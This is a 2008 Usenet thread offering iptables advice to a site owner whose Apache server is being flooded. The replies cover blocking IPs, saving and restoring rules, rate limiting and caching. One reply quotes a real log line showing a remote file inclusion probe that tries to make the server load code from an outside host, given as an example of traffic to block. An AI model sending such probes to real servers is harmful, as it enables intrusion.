Iptables to Manage web-Attacks [Linux Expert]

Paris,
le 16 Feb 2008,

Dear all,

Know how to manage iptables ?

Point is we have a WS that is receiving tons of anormal IPs that are
connecting at a rapid pace.

We attempt to believe that our Histing House (Affi nity) are true
profesionnals : much better than we are.

We do not know why since 7 days someone destroys everything launching
tons of connexions : The problem is Apache is getting over loaded with
requests until the server runs out of memory and crashes.
For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
attacks.

Hosting experts enabled syn-cookies, modified Apache timeouts and
Server-Pool Size Regulation, and blocked ips in iptables.

I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
line : "locate iptables" and editing files.

Could not figure out where the IPs are listed and added to the
definition list.

Nothing in :
/var/lock/subsys/iptables
/etc/sysconfig/iptables-config
/lib/iptables
/etc/sysconfig/iptables
/sbin/iptables

Do you know the name of the file & location that includes the list of
blocked IPs ?

Many thanks and Regards for in advices.
cougloff

On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme rearranged some electrons
to say:

> Paris,
> le 16 Feb 2008,
>
> Dear all,
>
> Know how to manage iptables ?
>
> Point is we have a WS that is receiving tons of anormal IPs that are
> connecting at a rapid pace.
>
> We attempt to believe that our Histing House (Affi nity) are true
> profesionnals : much better than we are.
>
> We do not know why since 7 days someone destroys everything launching
> tons of connexions : The problem is Apache is getting over loaded with
> requests until the server runs out of memory and crashes. For sure our
> USD 1.10 EBITDA / Day loss-of-time company worth these attacks.
>
> Hosting experts enabled syn-cookies, modified Apache timeouts and
> Server-Pool Size Regulation, and blocked ips in iptables.
>
> I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line : "locate iptables" and editing files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Nothing in :
> /var/lock/subsys/iptables
> /etc/sysconfig/iptables-config
> /lib/iptables
> /etc/sysconfig/iptables
> /sbin/iptables
>
> Do you know the name of the file & location that includes the list of
> blocked IPs ?
>
> Many thanks and Regards for in advices. cougloff

You could use tcp wrappers:
man tcpd

On a sunny day (Sat, 16 Feb 2008 10:58:48 -0800 (PST)) it happened Pseudonyme
<(E-Mail Removed)> wrote in
<b0e0b9c3-4a98-40b8-b205-(E-Mail Removed)>:

>I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
>line : "locate iptables" and editing files.
>
>Could not figure out where the IPs are listed and added to the
>definition list.
>
>Nothing in :
>/var/lock/subsys/iptables
>/etc/sysconfig/iptables-config
>/lib/iptables
>/etc/sysconfig/iptables
>/sbin/iptables
>
>Do you know the name of the file & location that includes the list of
>blocked IPs ?
>
>Many thanks and Regards for in advices.
>cougloff

I use iptables for this, but of course in my own way ;-)

I have a script, I run as root:
----------------------------------------------------
# this is called to add a input deny for an IP addres to ipchains,
# and save the configuration.

if [ "$1" = "" ]
then
echo "Usage: reject IP_address"
exit 1
fi
iptables -A INPUT -s $1 -p all -j DROP
iptables -A OUTPUT -s $1 -p all -j REJECT

iptables-save > /root/firewall


exit 0
--------------------------------------------------


Fo example if I see in apache log something like this:
83.137.193.66 www.stockguard.nl - - [15/Feb/2008:20:27:49 +0100] "GET /panteltje/fpga//cp2.php?securelib=http://www.hotellasamericas.com.co//cache/id.txt??? HTTP/1.1" 404 887
then, despite that the bad guy got a 404, I do:
reject 83.137.193.66
And he will never find my server again, or get any response from it, as the nameserver is also here.

You will see from the above script that you can make your own list with:

iptables-save > /path_to/yourtables


There is also an iptables-restore, to initialize at power up:
/sbin/iptables-restore < /path_to/yourtables

You can flush with
iptables -F

or list all entries (takes a long time as it does nslookup) with
iptables -L

Pseudonyme wrote:

>
> Paris,
> le 16 Feb 2008,
>
> Dear all,
>
> Know how to manage iptables ?
>
> Point is we have a WS that is receiving tons of anormal IPs that are
> connecting at a rapid pace.
>
> We attempt to believe that our Histing House (Affi nity) are true
> profesionnals : much better than we are.
>
> We do not know why since 7 days someone destroys everything launching
> tons of connexions : The problem is Apache is getting over loaded with
> requests until the server runs out of memory and crashes.
> For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
> attacks.
>
> Hosting experts enabled syn-cookies, modified Apache timeouts and
> Server-Pool Size Regulation, and blocked ips in iptables.
>
> I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line : "locate iptables" and editing files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Nothing in :
> /var/lock/subsys/iptables
> /etc/sysconfig/iptables-config
> /lib/iptables
> /etc/sysconfig/iptables
> /sbin/iptables
>
> Do you know the name of the file & location that includes the list of
> blocked IPs ?
>
> Many thanks and Regards for in advices.
> cougloff

When you find it, why not post it? Make for good reading...


--

Jerry McBride ((E-Mail Removed))

Pseudonyme wrote:

> Know how to manage iptables ?

This depends on which "firewall" you are using to generate the iptables rules.


> I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line : "locate iptables" and editing files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Do you know the name of the file & location that includes the list of
> blocked IPs ?

Use iptables to add a new rule (see the manual page for iptables or visit
www.iptables.org) and then use the iptables save feature to store the data for
next restart.


--

//Aho

On 16 Feb, 19:58, Pseudonyme <norman_cougl...@2cuk.co.uk> wrote:
> Paris,
> le 16 Feb 2008,
>
> Dear all,
>
> Know how to manage iptables ?
>
> Point is we have a WS that is receiving tons of anormal IPs that are
> connecting at a rapid pace.
>
> We attempt to believe that our Histing House (Affi nity) are true
> profesionnals : much better than we are.
>
> We do not know why since 7 days someone destroys everything launching
> tons of connexions : The problem is Apache is getting over loaded with
> requests until the server runs out of memory and crashes.
> For sure our USD 1.10 EBITDA / Day loss-of-time company worth these
> attacks.
>
> Hosting experts enabled syn-cookies, modified Apache timeouts and
> Server-Pool Size Regulation, and blocked ips in iptables.
>
> I go through the iptables "Unix/Linux/Fedora 2/Apache 2.0.50" command
> line : "locate iptables" and editing files.
>
> Could not figure out where the IPs are listed and added to the
> definition list.
>
> Nothing in :
> /var/lock/subsys/iptables
> /etc/sysconfig/iptables-config
> /lib/iptables
> /etc/sysconfig/iptables
> /sbin/iptables
>
> Do you know the name of the file & location that includes the list of
> blocked IPs ?
>
> Many thanks and Regards for in advices.
> cougloff

If you want, you can use the graphic tool system-config-firewall; it
does a good job...

On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:

> We do not know why since 7 days someone destroys everything launching
> tons of connexions : The problem is Apache is getting over loaded with
> requests until the server runs out of memory and crashes. For sure our
> USD 1.10 EBITDA / Day loss-of-time company worth these attacks.

Perhaps blocking more than N connections per time unit from any IP
address? This could block quick legitimate accesses, but it might also
block what appear to be DOS attacks.

iptables can do this. See the "hashlimit" module.

This will only work if there are many connections from a given IP. If
the attack is sufficiently distributed, this will block too much
legitimate traffic before helping with the attacks. But if you're trying
to block individual IPs, then perhaps the attack is not terribly
distributed.

- Andrew

On Sat, 16 Feb 2008 10:58:48 -0800, Pseudonyme wrote:
>
> We do not know why since 7 days someone destroys everything launching
> tons of connexions : The problem is Apache is getting over loaded with
> requests until the server runs out of memory and crashes. For sure our
> USD 1.10 EBITDA / Day loss-of-time company worth these attacks.


Have you thought of putting in a reverse cache server and putting in a
redirect for the page(s) they are requesting.
Then the cache will respond much faster while the existing server can take
care of the redirected traffic which the "attacker" probably won't follow as
its unlikely they are actually looking at the response or even waiting for
it.
You may even be able to do this on a hosted server so that the attacks never
arrive at your physical site.
You may have to change the redirects if the attacker decides to follow you
about to your original server but its better than nothing and the host
provider probably has experience of stopping these attacks using filters and
they have the bandwidth to do it which you probably don't.